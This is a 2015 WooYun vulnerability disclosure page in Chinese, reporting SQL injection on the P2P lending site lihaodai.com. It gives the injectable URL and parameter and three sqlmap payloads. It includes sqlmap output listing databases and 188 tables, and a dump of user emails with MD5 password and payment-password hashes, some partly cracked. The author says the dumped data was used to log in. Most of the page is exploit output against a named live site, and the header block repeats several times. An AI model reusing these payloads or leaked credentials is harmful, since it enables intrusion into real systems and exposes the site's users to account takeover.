P2P利好贷存在SQL注入漏洞涉及用户信息可登录

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0153481

漏洞标题：P2P利好贷存在SQL注入漏洞涉及用户信息可登录

漏洞作者： Nelion

提交时间：2015-11-11 11:24

修复时间：2015-12-26 11:24

公开时间：2015-12-26 11:24

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-11-11：积极联系厂商并且等待厂商认领中，细节不对外公开
2015-12-26：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

P2P金融利好贷（http://www.lihaodai.com/）存在sql注入漏洞,能获得用户登录数据。

详细说明：

利好贷公司是一家网络P2P投融资平台公司，位于福建厦门。利好贷是由资深投资人与多家深度合作担保公司总结多年的投资经验应用大数据和科学的风控技术，共同倾力打造的网络P2P投融资平台。（百度百科）
1、注入点：http://www.lihaodai.com/dyweb/dythemes/diyou/css/xsd/xsshow.php?xsRealName=admin（参数xsRealName存在注入）

Parameter: xsRealName (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: xsRealName=-8059' OR 1355=1355#
    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause
    Payload: xsRealName=-1233' OR 1 GROUP BY CONCAT(0x716b716a71,(SELECT (CASE W
HEN (1749=1749) THEN 1 ELSE 0 END)),0x7170627a71,FLOOR(RAND(0)*2)) HAVING MIN(0)
#
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT - comment)
    Payload: xsRealName=admin' AND (SELECT * FROM (SELECT(SLEEP(5)))UtYI)#
---
[01:19:15] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 7.0 (wheezy)
web application technology: PHP 5.4.36, Apache 2.2.22
back-end DBMS: MySQL 5.0.12

漏洞证明：

2、所有数据库：

available databases [6]:
[*] information_schema
[*] lihaodai
[*] mysql
[*] performance_schema
[*] testtwolihaodai
[*] xuesheng

3、数据库lihaodai中的188个表：

Database: lihaodai
[188 tables]
+---------------------------------+
| deayou_account                  |
| deayou_approve_realname         |
| deayou_users                    |
| deayou_users_info               |
| diyou_account                   |
| diyou_account_balance           |
| diyou_account_bank              |
| diyou_account_cash              |
| diyou_account_fee               |
| diyou_account_fee_type          |
| diyou_account_log               |
| diyou_account_payment           |
| diyou_account_recharge          |
| diyou_account_users             |
| diyou_account_users_bank        |
| diyou_account_web               |
| diyou_admin                     |
| diyou_admin_log                 |
| diyou_admin_login               |
| diyou_admin_type                |
| diyou_app_info                  |
| diyou_approve                   |
| diyou_approve_edu               |
| diyou_approve_edu_id5           |
| diyou_approve_id5               |
| diyou_approve_realname          |
| diyou_approve_sms               |
| diyou_approve_smslog            |
| diyou_approve_video             |
| diyou_areas                     |
| diyou_articles                  |
| diyou_articles_pages            |
| diyou_articles_type             |
| diyou_attestations              |
| diyou_attestations_type         |
| diyou_attestations_user         |
| diyou_borrow                    |
| diyou_borrow_activity           |
| diyou_borrow_amount             |
| diyou_borrow_amount_apply       |
| diyou_borrow_amount_log         |
| diyou_borrow_amount_type        |
| diyou_borrow_apply              |
| diyou_borrow_auto               |
| diyou_borrow_autolog            |
| diyou_borrow_care               |
| diyou_borrow_change             |
| diyou_borrow_change_rate        |
| diyou_borrow_count              |
| diyou_borrow_count_log          |
| diyou_borrow_credit             |
| diyou_borrow_fee                |
| diyou_borrow_fee_loan           |
| diyou_borrow_fee_log            |
| diyou_borrow_fee_type           |
| diyou_borrow_flag               |
| diyou_borrow_frost              |
| diyou_borrow_newtype            |
| diyou_borrow_preview            |
| diyou_borrow_recover            |
| diyou_borrow_repay              |
| diyou_borrow_roam               |
| diyou_borrow_style              |
| diyou_borrow_tender             |
| diyou_borrow_tender_auto        |
| diyou_borrow_tender_autolog     |
| diyou_borrow_tender_web         |
| diyou_borrow_type               |
| diyou_borrow_verify             |
| diyou_borrow_vouch              |
| diyou_borrow_vouch_recover      |
| diyou_borrow_vouch_repay        |
| diyou_borrow_youxuan            |
| diyou_borrow_youxuan_tender     |
| diyou_comment                   |
| diyou_comments                  |
| diyou_credit                    |
| diyou_credit_class              |
| diyou_credit_log                |
| diyou_credit_rank               |
| diyou_credit_type               |
| diyou_daily_bao                 |
| diyou_daily_log                 |
| diyou_dw_activity_review        |
| diyou_email                     |
| diyou_email_log                 |
| diyou_email_port                |
| diyou_email_sendlog             |
| diyou_exchange_log              |
| diyou_experience_cash           |
| diyou_experience_log            |
| diyou_goods                     |
| diyou_goods_type                |
| diyou_group                     |
| diyou_group_articles            |
| diyou_group_comments            |
| diyou_group_log                 |
| diyou_group_member              |
| diyou_group_type                |
| diyou_linkages                  |
| diyou_linkages_class            |
| diyou_linkages_type             |
| diyou_links                     |
| diyou_links_type                |
| diyou_message                   |
| diyou_message_receive           |
| diyou_modules                   |
| diyou_newspreads_cash_log       |
| diyou_newspreads_commission_log |
| diyou_newspreads_commission_set |
| diyou_newspreads_log            |
| diyou_newspreads_set            |
| diyou_newspreads_subsidy_log    |
| diyou_newspreads_users          |
| diyou_phone                     |
| diyou_phone_log                 |
| diyou_phone_port                |
| diyou_phone_smslog              |
| diyou_rating_assets             |
| diyou_rating_company            |
| diyou_rating_contact            |
| diyou_rating_educations         |
| diyou_rating_finance            |
| diyou_rating_houses             |
| diyou_rating_info               |
| diyou_rating_job                |
| diyou_red_envelope_config       |
| diyou_red_envelope_log          |
| diyou_remind                    |
| diyou_remind_log                |
| diyou_remind_type               |
| diyou_remind_user               |
| diyou_risk_account_log          |
| diyou_scrollpic                 |
| diyou_scrollpic_type            |
| diyou_site                      |
| diyou_site_menu                 |
| diyou_sms_type                  |
| diyou_spread_add                |
| diyou_spread_log                |
| diyou_spreads_log               |
| diyou_spreads_set               |
| diyou_spreads_settle_log        |
| diyou_spreads_users             |
| diyou_sysauto_auto              |
| diyou_sysauto_log               |
| diyou_system                    |
| diyou_ucenter                   |
| diyou_ucenter_set               |
| diyou_update_system             |
| diyou_users                     |
| diyou_users_admin               |
| diyou_users_admin_login         |
| diyou_users_admin_type          |
| diyou_users_adminlog            |
| diyou_users_care                |
| diyou_users_care_user           |
| diyou_users_email               |
| diyou_users_email_log           |
| diyou_users_examines            |
| diyou_users_friends             |
| diyou_users_friends_invite      |
| diyou_users_friends_type        |
| diyou_users_info                |
| diyou_users_log                 |
| diyou_users_login               |
| diyou_users_qq                  |
| diyou_users_rebut               |
| diyou_users_reglog              |
| diyou_users_return_log          |
| diyou_users_set                 |
| diyou_users_sina                |
| diyou_users_type                |
| diyou_users_upfiles             |
| diyou_users_vip                 |
| diyou_users_vip_bak             |
| diyou_users_viplog              |
| diyou_users_viplog_bak          |
| diyou_users_visit               |
| diyou_wechat_attention          |
| diyou_wechat_focususers         |
| diyou_wechat_material           |
| diyou_wechat_menu               |
| diyou_wechat_recovery           |
| diyou_wechat_sendmsg            |
| diyou_wechat_sendmsg_log        |
| diyou_wechat_set                |
| diyou_wechat_users              |
+---------------------------------+

4、deayou_users表中的字段：

Database: lihaodai
Table: deayou_users
[14 columns]
+----------------+------------------+
| Column         | Type             |
+----------------+------------------+
| block_status   | int(1)           |
| email          | char(32)         |
| last_ip        | char(15)         |
| last_time      | int(10)          |
| logintime      | int(11)          |
| password       | char(32)         |
| paypassword    | varchar(100)     |
| reg_ip         | char(15)         |
| reg_time       | int(10)          |
| tuijian_userid | int(11)          |
| up_ip          | char(15)         |
| up_time        | int(10)          |
| user_id        | int(11) unsigned |
| username       | char(15)         |
+----------------+------------------+

5、字段email，password，paypassword的数据（只看一部分）：

| [email protected]  | 3b8403d686bbf542901925af2cabb01a            | NULL
                     |
| 1000**[email protected]   | d0dcbf0d12a6b1e7fbfa2ce5848f3eff (**123456) | 62649863c025
d9577a1fa083ccfd371d |
| [email protected] | ca0d88224e8e4ad38bbe0d361aa33f61            | c0d843406e43
169a23124018992a77f7 |
| [email protected] | 3030737f23dea935c4a7e399e56cf30d            | NULL
                     |
| [email protected] | 8bbda585acf997a32acb39564463ec43            | 5c47452c631d
c649f799dfc259fd6f85 |
| [email protected] | 7f247a14c68f54fd0314a5c3fdb02774            | NULL
                     |
| [email protected] | a125e96d56f565f75ba27804886eecb8            | NULL
                     |
| [email protected] | 8b164f1c39a90644b8e09f5760370574            | NULL
                     |
| [email protected] | b2661916664effefd6d81b4ace9f2167            | NULL
                     |
| [email protected] | 2a83ee66c34d5e683324fd81acec8301            | 315571c9e6d1
8d1224276f49501a13fd |
| [email protected] | 0f7668f4f2760a810fd6590df15ceeb6            | NULL
                     |
| [email protected]    | 0c9312e5144f08599bd13cc895dcde54            | NULL
                     |
| [email protected] | db109d7f3e07b2b9e6009e3ed4b352d8            | NULL
                     |
| [email protected] | 2ae19517e1a61dc7313a028252228746            | NULL
                     |
| [email protected] | 77f451ef7a1180b89390d72a3e605871            | 64006d701279
0588829719f7c1894213 |
| [email protected] | 1e566843372eabac85a2d353c13b4e18            | NULL
                     |
| [email protected]       | 7146ae0cc5e79ffad343632a432ebf08            | f01ea624e75b
18b141a340f9f46d8542 |
| [email protected] | 5a804ca36c543a14766ae1d3287ae675            | 0b85874fa48e
c5fee3beeec26e358aa9 |
| [email protected] | 6380212fca05f9676afd6f23ee0f4c80            | f6aec20d1dce
52ad15c56a30326087af |
| [email protected] | eb696f1b64c6a7ae0767d0a3176ecb53            | NULL
                     |
| 101**[email protected] | 0eafe0ae2aa251fd0c5990274faa606b (1**506)   | NULL

6、用dump下来的数据登录一下：

修复方案：

参数过滤。

版权声明：转载请注明来源 Nelion@乌云

漏洞回应

厂商回应：

未能联系到厂商或者厂商积极拒绝

漏洞Rank：15 (WooYun评价)

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0153481

漏洞标题：P2P利好贷存在SQL注入漏洞涉及用户信息可登录

相关厂商：利好贷

漏洞作者： Nelion

提交时间：2015-11-11 11:24

修复时间：2015-12-26 11:24

公开时间：2015-12-26 11:24

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Nelion@乌云

漏洞回应

厂商回应：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0153481

漏洞标题：P2P利好贷存在SQL注入漏洞涉及用户信息可登录

相关厂商：利好贷

漏洞作者： Nelion

提交时间：2015-11-11 11:24

修复时间：2015-12-26 11:24

公开时间：2015-12-26 11:24

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：未联系到厂商或者厂商积极忽略

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0153481"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Nelion@乌云

漏洞回应

厂商回应：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：